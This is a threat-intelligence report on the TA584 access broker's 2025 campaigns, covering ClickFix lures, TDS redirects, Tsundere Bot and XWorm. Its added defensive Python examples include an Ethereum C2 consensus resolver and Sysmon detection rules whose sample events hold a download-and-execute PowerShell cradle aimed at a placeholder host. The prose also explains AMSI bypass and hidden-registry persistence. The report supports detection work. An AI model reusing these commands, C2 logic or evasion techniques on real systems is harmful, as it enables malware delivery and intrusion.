Multiple sophisticated cybercriminal threat actors remain active across the global threat landscape, but one of the most consistently prolific is TA584. This actor operates as a high-volume initial access broker (IAB), running large-scale campaigns that target organizations worldwide. During the second half of 2025, TA584 demonstrated notable evolution across its attack chains, including adoption of the ClickFix social engineering technique, more deliberate geographic and language-specific targeting, and the introduction of a new malware family known as Tsundere Bot. TA584 activity overlaps with a cluster tracked separately as Storm-0900.
Throughout 2025, TA584 steadily increased its operational tempo. Monthly campaign volume tripled between March and December 2025, reflecting both growing confidence and a shift toward faster, more iterative operations.
TA584 Background
Tracked since November 2020, TA584 has historically relied on a range of tactics, techniques, and procedures (TTPs) for initial access. Earlier delivery methods included macro-enabled Excel documents, heavily filtered URLs, traffic distribution services (TDS), and geo-fenced landing pages.
While TA584 has been active for several years, its earlier campaigns followed relatively predictable and long-lived patterns. Infrastructure, lure themes, and delivery mechanisms were often reused for extended periods. In contrast, activity observed throughout 2025 shows a clear departure from this model. Campaigns are now launched, modified, and retired rapidly, resulting in high campaign churn and short operational lifespans.
Rather than refining a single successful attack chain, TA584 favors constant iteration. Throughout 2025, the actor ran overlapping campaigns that used distinct lure themes, branding, and landing pages, with individual campaigns often remaining active for only hours or days. This sustained pattern highlights how modern financially motivated threat actors adapt aggressively to defensive pressure by prioritizing speed and variability over longevity.
Data Scope and Methodology
This analysis focuses on email as the initial access vector for TA584 activity. Although the actor has been monitored intermittently since 2020, the findings here primarily cover activity observed in 2025, when campaign volume, operational tempo, and technical diversity increased significantly.
The analysis traces activity from initial email delivery through malware execution, providing visibility into how TA584 adapts social engineering techniques, delivery infrastructure, and payload execution while maintaining certain consistent behaviors. The scope is intentionally limited to pre-compromise and early execution stages, including email lure construction, brand impersonation, localization strategies, landing page design, filtering infrastructure, and malware execution.
Campaigns were identified and clustered using multiple correlated attributes, such as delivery characteristics, shared or structurally similar infrastructure, execution behaviors, geofencing logic, landing page layouts, malware configurations, and recurring lure elements. Attribution to TA584 is based on long-term tracking continuity and recurring patterns observed across multiple years.
TA584’s 2025 activity demonstrates how rapid campaign turnover and deliberate variability reduce the effectiveness of static indicators, complicating traditional tracking and detection approaches.
Campaign Details
Social Engineering
TA584 impersonates a wide range of organizations, including job recruitment firms (for example, Michael Page and Adecco), business services (such as BBB and Companies House), and well-known brands like PayPal, OSHA, Medicare, OneDrive, and YourCostSolutions.
Healthcare is the most frequently impersonated vertical, followed by government entities. Campaigns have impersonated hospitals, care facilities, and multiple government agencies across several countries.
Social engineering content is a key strength of TA584 operations. Emails and landing pages are tightly aligned, professionally designed, and highly believable. Brand impersonation reinforces credibility, but brands are typically used only briefly before being rotated out in subsequent campaigns. Brand selection often aligns with geographic targeting, leveraging regionally relevant organizations to increase trust.
Despite constant surface-level changes, the underlying social engineering objective remains consistent: create urgency or implied legitimacy to prompt recipients to view documents, review transactions, or resolve supposed issues. This variability significantly reduces the effectiveness of content-based detection and increases the likelihood that at least some variants bypass filtering controls.
Observed lure themes during 2025 included debt collection, payment processing, event invitations, tax obligations, medical test results, healthcare benefits, parking tickets, recruiting messages, and business complaints.
In December 2025, one campaign introduced a particularly unusual technique: embedding a photo of purported physical mail that included the recipient’s name and address. This level of personalization likely increased lure credibility. While rare, Proofpoint has observed similar techniques used recently by TA2725.
Attack Chain
TA584 uses multiple email delivery methods. In 2025, most campaigns originated from compromised individual email accounts. Each campaign typically used several display names aligned with the lure theme, and a single wave could involve hundreds of compromised senders across unrelated, legitimate, and often aged domains.
Occasionally, TA584 also sent messages through third-party email service providers such as SendGrid and Amazon SES, likely using stolen credentials for accounts whose sending domains were already authenticated. Authenticating a domain with these providers requires publishing their SPF and DKIM records, so it implies DNS-level control of that domain; messages sent this way pass standard email authentication checks.
Because emails originate from authenticated, aged senders and vary heavily in subject lines and URLs, tracking and clustering campaigns based solely on email characteristics is challenging.
Emails generally contain a URL that is unique per recipient. The server behind it applies geofencing and IP-based filtering, and only requests that pass are redirected to a landing page matched to the lure; requests that fail the checks never reach the lure, which is why replaying a link from outside the targeted region rarely reproduces the chain. Between March 2021 and July 2025, landing pages typically featured a countdown timer, recipient personalization, and a CAPTCHA. Solving the CAPTCHA revealed a download button for a zipped JavaScript file or a Windows shortcut (.lnk).
Earlier campaigns also delivered macro-enabled Excel documents (EtterSilent) directly after filtering checks, leading to malware installation if macros were enabled.
Adoption of ClickFix
From late July 2025 onward, TA584 shifted to the ClickFix social engineering technique. ClickFix relies on fake error or verification dialogs that instruct the user to copy a command, paste it into the Windows Run dialog or a terminal, and execute it. Because the user, not the browser, runs the command and no file is downloaded through the browser, controls that inspect or block downloads and attachments never see a payload.
Current campaigns use unique URLs that lead to customized landing pages featuring a “slide” CAPTCHA. Once solved, victims are presented with ClickFix instructions that execute a PowerShell command. This command retrieves a remote intermediate PowerShell script containing obfuscated code that executes the malware payload.
The script is only retrievable from the same IP address that accessed the landing page. Once retrieved, the landing page confirms execution and redirects the user to a benign site (for example, docusign[.]com), reducing suspicion.
Redirect Infrastructure
TA584 consistently uses layered redirect chains and intermediary resources to obscure payload delivery. URLs are not reused across campaigns, and redirect infrastructure is frequently rotated, often involving third-party criminal services.
Earlier campaigns commonly relied on Cookie Reloaded (Prometheus TDS). In 2025, TA584 occasionally used Keitaro TDS but most frequently relied on 404 TDS. This service issues short-lived redirect links, typically valid for one day, and has historically delivered the redirect as a meta refresh tag inside the body of an HTTP 404 response rather than as an HTTP 3xx redirect. Crawlers and URL scanners that treat a 404 as a dead link stop there, while a browser follows the meta refresh to the next stage.
After third-party filtering, victims are redirected to actor-controlled domains where additional IP-based filtering is performed. Final landing pages are hosted under campaign-specific paths. Domains are typically used for only one or two campaigns and rotated weekly, although backend IP addresses often remain static for extended periods. For example, 94[.]159[.]113[.]37 has been in use since April 2025.
Because of layered filtering and redirects, full attack chains are rarely captured by public sandboxes or URL scanners.
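The following is an added example, not Proofpoint tooling or 404 TDS code. It simulates the behaviour described above (the next hop carried as a `<meta http-equiv="refresh">` tag inside an HTTP 404 body, followed by a conventional 3xx redirect to an actor-controlled domain) and shows why a client that treats 404 as terminal never reaches the landing page. Every URL and response in it is constructed for the example.

```python
"""Follow a redirect chain that hides the next hop in an HTTP 404 body.

Added example, not Proofpoint tooling or 404 TDS code. All URLs and
responses are constructed placeholders, not observed infrastructure.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


class MetaRefreshParser(HTMLParser):
    """Pull the URL out of the first <meta http-equiv="refresh" content="N;url=..."> tag."""

    def __init__(self):
        super().__init__()
        self.target = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta" or self.target is not None:
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        _, sep, rest = a.get("content", "").partition(";")
        rest = rest.strip()
        if sep and rest[:3].lower() == "url":
            rest = rest[3:].lstrip().lstrip("=").strip()
        if rest:
            self.target = rest.strip("'\"")


def meta_refresh_target(body: str, base_url: str):
    """Absolute URL named by a meta refresh in `body`, or None."""
    p = MetaRefreshParser()
    p.feed(body)
    return urljoin(base_url, p.target) if p.target else None


def next_hop(url, status, headers, body, follow_404_meta=True):
    """Next URL in the chain, or None if this response is terminal."""
    if status in REDIRECT_STATUSES and headers.get("Location"):
        return urljoin(url, headers["Location"])
    # A naive client only looks for meta refresh on 200; a browser also renders a 404 body.
    if status == 200 or (status == 404 and follow_404_meta):
        return meta_refresh_target(body, url)
    return None


def follow_chain(start, fetch, follow_404_meta=True, max_hops=10):
    """Walk the chain with `fetch(url) -> (status, headers, body)`; return the URLs visited."""
    chain, url = [start], start
    for _ in range(max_hops):
        resp = fetch(url)
        if resp is None:
            break
        nxt = next_hop(url, *resp, follow_404_meta=follow_404_meta)
        if nxt is None or nxt in chain:  # terminal page or redirect loop
            break
        chain.append(nxt)
        url = nxt
    return chain


# Constructed responses standing in for the three tiers described above:
# TDS link (404 + meta refresh), filtering host (302), actor landing page (200).
FAKE_RESPONSES = {
    "https://tds.example/r/abc": (
        404, {},
        "<html><head><meta http-equiv=\"refresh\" "
        "content=\"0;url=https://filter.example/chk?id=7\"></head>"
        "<body>Not Found</body></html>"),
    "https://filter.example/chk?id=7": (
        302, {"Location": "https://lure-landing.example/c/campaign42/"}, ""),
    "https://lure-landing.example/c/campaign42/": (
        200, {}, "<html><body><h1>Verify you are human</h1></body></html>"),
}


def fake_fetch(url):
    """Offline stand-in for an HTTP client; unknown URLs return None."""
    return FAKE_RESPONSES.get(url)


if __name__ == "__main__":
    print("browser-like:", follow_chain("https://tds.example/r/abc", fake_fetch))
    print("naive scanner:", follow_chain("https://tds.example/r/abc", fake_fetch, follow_404_meta=False))
```

Running it with `follow_404_meta=False` reproduces the scanner blind spot: the walk ends at the TDS link, because the HTTP status alone says nothing is there. In a real crawler the same function would sit behind an HTTP client that also sends the targeted region's geolocation and a residential-looking source address, since the filtering tier described above discards everything else.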
Targeting
Campaigns typically target hundreds of organizations, with volumes ranging from a few thousand to nearly 200,000 emails per campaign.
Historically, TA584 focused on North America, the UK, and Ireland. In late July 2025, the actor expanded to consistently target Germany at scale, followed by broader European targeting during the summer. By fall 2025, activity shifted back toward North America, with limited but recurring targeting of Australia.
Campaigns often focus on specific regions, rotating geography frequently. In some cases, different regions were targeted within the same week using entirely distinct branding, languages, and lure themes. This rotational targeting helps sustain high operational tempo while minimizing repeated exposure within any single region.
Malware Payloads
TA584’s primary payload throughout 2025 was XWorm, using the “P0WER” configuration. Beginning in late November 2025, the actor also began distributing Tsundere Bot, which quickly became a favored payload alongside XWorm.
Previously observed payloads include Ursnif (2020–2022), LDR4 (2022–2023), WarmCookie (2024), Xeno RAT (2024), and Cobalt Strike (2024). A single September 2025 campaign delivered DCRAT, which was not reused.
Tsundere Bot
Tsundere Bot was first observed in Proofpoint data in August 2025 and adopted by TA584 in late November 2025. It is a malware-as-a-service platform with backdoor and loader functionality, marketed through panels identified as “Tsundere Netto” and “Tsundere Reborn.”
The malware requires Node.js, which is installed via MSI installers or PowerShell scripts generated by the C2 panel. Capabilities include:
- Ethereum-based C2 resolution using a variant of EtherHiding, with consensus logic across multiple RPC providers
- WebSocket-based C2 communication
- Locale checks that terminate execution on systems with a CIS (Commonwealth of Independent States) locale
- Extensive system profiling and unique victim ID generation
- Arbitrary JavaScript execution
- Persistent heartbeat communication
The C2 panel supports bot management, installer generation, automated tasking, SOCKS5 proxy usage, and bot resale.
Proofpoint assesses with high confidence that Tsundere Bot infections can lead to ransomware deployment.
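The report states that Tsundere Bot resolves its C2 on Ethereum with an EtherHiding variant and consensus logic across multiple RPC providers, but not how that is implemented. The block below is an added example, not Tsundere Bot's code: it assumes the usual EtherHiding pattern (an `eth_call` to a contract view function whose string return value is the C2 address), issued to several providers, with the answer accepted only when a majority agree. The contract address, function selector, provider URLs and responses are all constructed, and nothing touches the network.

```python
"""Majority-vote resolution of a C2 address published on Ethereum.

Added example, not Tsundere Bot's code. Assumes an EtherHiding-style
eth_call returning an ABI-encoded string; providers and data are constructed.
"""


def abi_encode_string(s: str) -> str:
    """ABI-encode a single dynamic `string` return value: offset, length, padded data."""
    data = s.encode()
    padded = data + b"\x00" * (-len(data) % 32)
    return ("0x" + (32).to_bytes(32, "big").hex()
            + len(data).to_bytes(32, "big").hex() + padded.hex())


def abi_decode_string(result: str) -> str:
    """Inverse of abi_encode_string, with the bounds checks a robust client needs."""
    raw = bytes.fromhex(result[2:] if result.startswith("0x") else result)
    if len(raw) < 64:
        raise ValueError("return data too short")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("bad offset")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("length exceeds return data")
    return raw[start:start + length].decode()


def resolve_c2(providers, eth_call, contract, selector, quorum=None):
    """Ask every provider; return (address, agreeing providers), or None without a majority."""
    quorum = quorum or len(providers) // 2 + 1
    votes = {}
    for p in providers:
        try:
            value = abi_decode_string(eth_call(p, {"to": contract, "data": selector}))
        except Exception:
            continue  # unreachable provider, RPC error or malformed reply: no vote
        votes.setdefault(value, []).append(p)
    if not votes:
        return None
    value, agreeing = max(votes.items(), key=lambda kv: len(kv[1]))
    return (value, agreeing) if len(agreeing) >= quorum else None


# Constructed environment: placeholder contract and selector, five providers.
CONTRACT = "0x" + "11" * 20
SELECTOR = "0x12345678"  # placeholder 4-byte function selector, not a real one
HONEST = ["https://rpc-a.example", "https://rpc-b.example", "https://rpc-c.example"]
TAMPERED = "https://rpc-d.example"  # answers with a different address (sinkhole or MITM)
BROKEN = "https://rpc-e.example"    # answers with an RPC error
PROVIDERS = HONEST + [TAMPERED, BROKEN]


def fake_eth_call(provider, call):
    """Offline stand-in for JSON-RPC eth_call; returns the hex result string."""
    if provider == BROKEN:
        raise RuntimeError("-32000: execution reverted")
    if provider == TAMPERED:
        return abi_encode_string("wss://sinkhole.example:443")
    return abi_encode_string("wss://c2.example:8443")


if __name__ == "__main__":
    print(resolve_c2(PROVIDERS, fake_eth_call, CONTRACT, SELECTOR))
```

Two defensive consequences follow from the shape of this logic. The contract itself cannot be taken down, and a single sinkholed or intercepted provider is outvoted, so redirecting one RPC endpoint does not neutralise the bot. What the bot cannot avoid is reaching some public RPC endpoint at all, which is why egress monitoring or blocking of Ethereum RPC hosts (see the recommendations below) is the practical control.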
XWorm “P0WER” Variant
The XWorm “P0WER” configuration is delivered via PowerShell scripts generated by a MaaS builder. The script disables AMSI by using .NET reflection to set the PowerShell runtime's internal AMSI initialization-failed flag, so the runtime skips content scanning for the rest of the session; it then reconstructs embedded payloads and reflectively loads a custom .NET loader.
Execution uses process hollowing: XWorm is written into a suspended RegSvcs.exe process, so the RAT itself never exists as a file on disk. Persistence is established with a SharpHide-style registry technique that inserts null bytes into key names. Tools that read the registry through the Win32 API (Regedit, reg.exe, Get-ItemProperty) stop at the null byte and cannot display or delete such entries, so hunting for them requires enumeration through the native NT registry API or offline parsing of the hive file.
This persistence launches a hidden PowerShell process on every boot, dynamically fetching payloads to maintain modular, resilient access.
Attribution and Assessment
Proofpoint assesses with high confidence that TA584 operates as an initial access broker whose infections frequently lead to ransomware. The actor has maintained operational continuity since 2020 and shows strong indicators of integration within Russian-language cybercriminal ecosystems.
Defensive Recommendations
- Restrict PowerShell usage to users who require it
- Enforce application control policies to block Node.js execution from user-writable paths
- Detect PowerShell or CMD spawning node.exe from non-standard locations
- Monitor or block outbound access to Ethereum RPC endpoints
- Inspect WebSocket traffic for unknown destinations
- Consider disabling Windows+R (the Run dialog) for non-technical users, for example with the “Remove Run menu from Start Menu” Group Policy setting under User Configuration > Administrative Templates > Start Menu and Taskbar
- Train users to recognize and report ClickFix-style social engineering
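The following is an added example, not a Proofpoint detection. It turns the ClickFix chain described under “Adoption of ClickFix” and the detection-oriented recommendations above into four checks over Sysmon-style process-creation (EID 1), registry value-set (EID 13) and network-connection (EID 3) events. Field names follow Sysmon; every event, path and hostname is constructed for the example, and the list of Ethereum RPC hosts is an assumption to be extended from your own telemetry.

```python
"""Triage Sysmon-style events for the TA584 execution chain described above.

Added example, not a Proofpoint detection. Events, paths and the RPC host
list are constructed/assumed, not taken from the report.
"""
import re
from pathlib import PureWindowsPath

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
# Standard Node.js install locations; anything else counts as non-standard.
NODE_STANDARD_DIRS = ("c:\\program files\\nodejs\\", "c:\\program files (x86)\\nodejs\\")
# Public Ethereum JSON-RPC hosts (assumed starting list, not from the report).
ETH_RPC_HOSTS = ("cloudflare-eth.com", "mainnet.infura.io",
                 "eth-mainnet.g.alchemy.com", "rpc.ankr.com", "eth.llamarpc.com")
# Download-and-execute cradles typical of ClickFix one-liners.
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                    r"downloadstring|iex|invoke-expression|curl|mshta)\b", re.I)
SHELL_IN_RUN = re.compile(r"\b(powershell|pwsh|cmd|mshta)\b", re.I)


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def clickfix_powershell(ev: dict) -> bool:
    """EID 1: a shell launched from explorer.exe (the Run dialog) with a download cradle."""
    return (ev["EventID"] == 1
            and image_name(ev["ParentImage"]) == "explorer.exe"
            and image_name(ev["Image"]) in SHELLS
            and CRADLE.search(ev.get("CommandLine", "")) is not None)


def runmru_shell(ev: dict) -> bool:
    """EID 13: Run-dialog history (RunMRU) recording a pasted shell command."""
    return (ev["EventID"] == 13
            and "\\explorer\\runmru\\" in ev["TargetObject"].lower()
            and SHELL_IN_RUN.search(ev.get("Details", "")) is not None)


def node_from_shell(ev: dict) -> bool:
    """EID 1: PowerShell/CMD spawning node.exe outside the standard install path."""
    return (ev["EventID"] == 1
            and image_name(ev["Image"]) == "node.exe"
            and image_name(ev["ParentImage"]) in SHELLS
            and not ev["Image"].lower().startswith(NODE_STANDARD_DIRS))


def eth_rpc_connection(ev: dict) -> bool:
    """EID 3: any process connecting to a public Ethereum RPC host."""
    host = ev.get("DestinationHostname", "").lower()
    return (ev["EventID"] == 3
            and any(host == h or host.endswith("." + h) for h in ETH_RPC_HOSTS))


RULES = (clickfix_powershell, runmru_shell, node_from_shell, eth_rpc_connection)


def triage(events):
    """Return (rule name, RecordID) for every event that matches a rule."""
    return [(rule.__name__, ev["RecordID"]) for ev in events for rule in RULES if rule(ev)]


# Constructed sample events (not observed telemetry). Records 4 and 6 are benign.
SAMPLE_EVENTS = [
    {"RecordID": 1, "EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr https://lure.example/s -UseBasicParsing)\""},
    {"RecordID": 2, "EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-1\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a",
     "Details": "powershell -w hidden -c \"iex (iwr https://lure.example/s)\"\\1"},
    {"RecordID": 3, "EventID": 1,
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\node\\node.exe",
     "CommandLine": "node.exe C:\\Users\\alice\\AppData\\Local\\Temp\\node\\a.js"},
    {"RecordID": 4, "EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Program Files\\nodejs\\node.exe", "CommandLine": "node.exe build.js"},
    {"RecordID": 5, "EventID": 3, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\node\\node.exe",
     "DestinationHostname": "cloudflare-eth.com", "DestinationPort": 443},
    {"RecordID": 6, "EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationHostname": "www.example.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for name, rid in triage(SAMPLE_EVENTS):
        print(f"record {rid}: {name}")
```

The first two rules are the ClickFix fingerprint: the user pastes the command into the Run dialog, so Explorer is the parent of the shell and the pasted text lands in RunMRU. If the lure instead directs the victim to a terminal, the parent is the terminal host process, so treat the explorer.exe condition as one variant rather than the whole detection. The node.exe rule implements the “non-standard locations” recommendation; tighten or extend `NODE_STANDARD_DIRS` to match where your organisation legitimately installs Node.js before deploying it.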
Conclusion
While many major threat actors disappeared from email telemetry in 2025, TA584 remained active and adaptive. Its increased operational tempo, geographic expansion, and adoption of new malware demonstrate an ongoing effort to broaden impact and evade defenses. Organizations should remain vigilant, prioritize behavioral detection, and implement layered controls to mitigate TA584-style intrusion paths.
